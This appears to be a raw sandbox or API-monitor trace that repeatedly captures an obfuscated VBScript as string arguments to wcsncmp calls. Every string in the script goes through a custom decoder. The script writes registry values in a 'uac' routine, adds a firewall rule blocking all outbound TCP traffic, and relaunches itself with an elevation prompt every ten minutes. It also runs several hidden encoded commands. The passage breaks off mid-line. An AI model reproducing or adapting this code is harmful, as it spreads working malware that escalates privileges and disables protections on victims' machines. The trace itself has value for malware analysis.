bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.028] wcsncmp (_String1="ionname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.028] wcsncmp (_String1="onname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.028] wcsncmp (_String1="nname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.028] wcsncmp (_String1="name = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.028] wcsncmp (_String1="ame = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 